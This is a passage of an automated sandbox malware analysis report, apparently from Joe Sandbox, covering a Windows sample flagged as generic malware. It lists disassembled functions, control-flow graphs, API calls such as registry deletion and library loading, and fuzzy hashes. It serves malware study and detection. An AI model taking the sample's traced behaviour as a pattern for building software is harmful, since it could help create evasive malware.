                                                                                                                          • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                        • String ID: 9
                                                                                                                        • API String ID: 163830602-2366072709
                                                                                                                        • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                                                        • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                                                                                        • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                                                        • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                        Function 004032B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 699 4032b9-4032d0 700 4032d2 699->700 701 4032d9-4032e1 699->701 700->701 702 4032e3 701->702 703 4032e8-4032ed 701->703 702->703 704 4032fd-40330a call 40349e 703->704 705 4032ef-4032f8 call 4034b4 703->705 709 403310-403314 704->709 710 403455 704->710 705->704 711 40331a-40333a GetTickCount call 406a70 709->711 712 40343e-403440 709->712 713 403457-403458 710->713 723 403494 711->723 725 403340-403348 711->725 714 403442-403445 712->714 715 403489-40348d 712->715 717 403497-40349b 713->717 718 403447 714->718 719 40344a-403453 call 40349e 714->719 720 40345a-403460 715->720 721 40348f 715->721 718->719 719->710 732 403491 719->732 726 403462 720->726 727 403465-403473 call 40349e 720->727 721->723 723->717 729 40334a 725->729 730 40334d-40335b call 40349e 725->730 726->727 727->710 735 403475-403481 call 4060c3 727->735 729->730 730->710 738 403361-40336a 730->738 732->723 741 403483-403486 735->741 742 40343a-40343c 735->742 740 403370-40338d call 406a90 738->740 745 403393-4033aa GetTickCount 740->745 746 403436-403438 740->746 741->715 742->713 747 4033f5-4033f7 745->747 748 4033ac-4033b4 745->748 746->713 751 4033f9-4033fd 747->751 752 40342a-40342e 747->752 749 4033b6-4033ba 748->749 750 4033bc-4033ed MulDiv wsprintfW call 4055a6 748->750 749->747 749->750 757 4033f2 750->757 755 403412-403418 751->755 756 4033ff-403404 call 4060c3 751->756 752->725 753 403434 752->753 753->723 759 40341e-403422 755->759 760 403409-40340b 756->760 757->747 759->740 761 403428 759->761 760->742 762 40340d-403410 760->762 761->723 762->759
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$wsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 551687249-2449383134
                                                                                                                        • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                                                        • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                                                                                        • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                                                        • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9
                                                                                                                        Function 004068A5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 763 4068a5-4068c5 GetSystemDirectoryW 764 4068c7 763->764 765 4068c9-4068cb 763->765 764->765 766 4068dc-4068de 765->766 767 4068cd-4068d6 765->767 769 4068df-406912 wsprintfW LoadLibraryExW 766->769 767->766 768 4068d8-4068da 767->768 768->769
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                        • wsprintfW.USER32 ref: 004068F7
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%S.dll$UXTHEME
                                                                                                                        • API String ID: 2200240437-1106614640
                                                                                                                        • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                        • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                                                                                        • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                        • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8
                                                                                                                        Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 770 402eae-402ed7 call 40638e 772 402edc-402ee0 770->772 773 402f91-402f95 772->773 774 402ee6-402eea 772->774 775 402eec-402f0d RegEnumValueW 774->775 776 402f0f-402f22 774->776 775->776 777 402f76-402f84 RegCloseKey 775->777 778 402f4b-402f52 RegEnumKeyW 776->778 777->773 779 402f24-402f26 778->779 780 402f54-402f66 RegCloseKey call 406915 778->780 779->777 782 402f28-402f3c call 402eae 779->782 786 402f86-402f8c 780->786 787 402f68-402f74 RegDeleteKeyW 780->787 782->780 788 402f3e-402f4a 782->788 786->773 787->773 788->778
                                                                                                                        APIs
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1354259210-0
                                                                                                                        • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                        • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                                                                                        • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                        • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                                                                                        Function 70591817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 789 70591817-70591856 call 70591bff 793 7059185c-70591860 789->793 794 70591976-70591978 789->794 795 70591869-70591876 call 70592480 793->795 796 70591862-70591868 call 7059243e 793->796 801 70591878-7059187d 795->801 802 705918a6-705918ad 795->802 796->795 805 70591898-7059189b 801->805 806 7059187f-70591880 801->806 803 705918cd-705918d1 802->803 804 705918af-705918cb call 70592655 call 70591654 call 70591312 GlobalFree 802->804 809 7059191e-70591924 call 70592655 803->809 810 705918d3-7059191c call 70591666 call 70592655 803->810 830 70591925-70591929 804->830 805->802 811 7059189d-7059189e call 70592e23 805->811 807 70591888-70591889 call 70592b98 806->807 808 70591882-70591883 806->808 821 7059188e 807->821 814 70591890-70591896 call 70592810 808->814 815 70591885-70591886 808->815 809->830 810->830 824 705918a3 811->824 829 705918a5 814->829 815->802 815->807 821->824 824->829 829->802 833 7059192b-70591939 call 70592618 830->833 834 70591966-7059196d 830->834 839 7059193b-7059193e 833->839 840 70591951-70591958 833->840 834->794 837 7059196f-70591970 GlobalFree 834->837 837->794 839->840 841 70591940-70591948 839->841 840->834 842 7059195a-70591965 call 705915dd 840->842 841->840 843 7059194a-7059194b FreeLibrary 841->843 842->834 843->840
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 70591BFF: GlobalFree.KERNEL32(?), ref: 70591E74
                                                                                                                          • Part of subcall function 70591BFF: GlobalFree.KERNEL32(?), ref: 70591E79
                                                                                                                          • Part of subcall function 70591BFF: GlobalFree.KERNEL32(?), ref: 70591E7E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 705918C5
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 7059194B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70591970
                                                                                                                          • Part of subcall function 7059243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7059246F
                                                                                                                          • Part of subcall function 70592810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70591896,00000000), ref: 705928E0
                                                                                                                          • Part of subcall function 70591666: wsprintfW.USER32 ref: 70591694
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3962662361-3916222277
                                                                                                                        • Opcode ID: 45ed69a1a92220e79e0cc401c604a956b51a2cf19d84702c7c39318d805e1292
                                                                                                                        • Instruction ID: 2ed620f12ae23405c80220a87eb45692be8b231c92311613f7df58bc5ed9bdf0
                                                                                                                        • Opcode Fuzzy Hash: 45ed69a1a92220e79e0cc401c604a956b51a2cf19d84702c7c39318d805e1292
                                                                                                                        • Instruction Fuzzy Hash: E041B2728202159FDB119F30DD8DB9D3FACAF04354F15446AF90BAE286DB749884DB6C
                                                                                                                        Function 00406040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 846 406040-40604c 847 40604d-406081 GetTickCount GetTempFileNameW 846->847 848 406090-406092 847->848 849 406083-406085 847->849 851 40608a-40608d 848->851 849->847 850 406087 849->850 850->851
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040605E
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-944333549
                                                                                                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                        • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                        • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                                                                                        Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405EA9
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                          • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\polaritets,?,00000000,000000F0), ref: 00401652
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\polaritets, xrefs: 00401645
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\polaritets
                                                                                                                        • API String ID: 1892508949-1397053051
                                                                                                                        • Opcode ID: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                                                        • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                                                        • Opcode Fuzzy Hash: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                                                        • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                                                        Function 004063EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 00406440
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue
                                                                                                                        • String ID: Call
                                                                                                                        • API String ID: 3356406503-1824292864
                                                                                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                        • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                        • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                                                        Function 00407074 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                        • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                                                        • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                        • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                                                        Function 00407275 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                                                        • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                                                                                        • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                                                        • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                                                                                        Function 00406F8B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                                                        • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
